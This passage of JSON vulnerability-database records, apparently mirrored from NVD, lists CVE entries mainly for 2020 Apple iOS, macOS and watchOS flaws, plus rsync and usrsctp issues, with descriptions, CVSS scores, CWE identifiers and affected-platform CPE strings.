"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9821"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9821", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9821", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:48", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9814", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9814"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-9814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9814", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:49", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5. Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9818", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9818"], "modified": "2020-06-12T15:00:00", "cpe": [], "id": "CVE-2020-9818", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9818", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:48", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9815", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9815"], "modified": "2022-04-27T14:32:00", "cpe": [], "id": "CVE-2020-9815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9815", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-27T15:24:09", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T21:15:00", "type": "cve", "title": "CVE-2020-3878", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878"], "modified": "2022-06-05T03:09:00", "cpe": ["cpe:/o:apple:mac_os_x:10.14.6", "cpe:/o:apple:mac_os_x:10.13.6"], "id": "CVE-2020-3878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3878", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.14.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2019-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2019-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2019-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2018-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2019-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2019-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2020-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2019-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2018-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.14.6:security_update_2020-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.13.6:security_update_2019-001:*:*:*:*:*:*"]}, {"lastseen": "2023-11-29T10:45:53", "description": "rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.", "cvss3": {}, "published": "2015-02-12T16:59:00", "type": "cve", "title": "CVE-2014-9512", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512"], "modified": "2020-07-28T20:15:00", "cpe": ["cpe:/a:samba:rsync:3.1.1", "cpe:/o:oracle:solaris:10.0", "cpe:/o:oracle:solaris:11.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:opensuse:opensuse:13.2"], "id": "CVE-2014-9512", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9512", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:samba:rsync:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T15:47:47", "description": "A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9803", "cwe": ["CWE-787", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803"], "modified": "2021-12-01T02:37:00", "cpe": [], "id": "CVE-2020-9803", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9803", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:56", "description": "An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9852", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9852"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9852", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9852", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:24:17", "description": "usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init.", "cvss3": {"cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-03-06T20:15:12", "type": "cve", "title": "CVE-2019-20503", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20503"], "modified": "2023-11-07T03:09:10", "cpe": [], "id": "CVE-2019-20503", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20503", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:52", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9816", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9816"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9816", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9816", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:51", "description": "An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A local user may be able to read kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9812", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9812"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9812", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:48", "description": "An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to determine kernel memory layout.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9809", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9809"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9809", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:47", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to cause unexpected system termination or write kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9808", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9808"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-9808", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9808", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:56", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A remote attacker may be able to cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9850", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9850"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9850", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9850", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:45", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9795", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9795"], "modified": "2020-06-11T17:08:00", "cpe": [], "id": "CVE-2020-9795", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9795", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:49", "description": "A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5, watchOS 5.3.7. Processing a maliciously crafted mail message may lead to heap corruption.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9819", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9819"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-9819", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9819", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:44", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9790", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 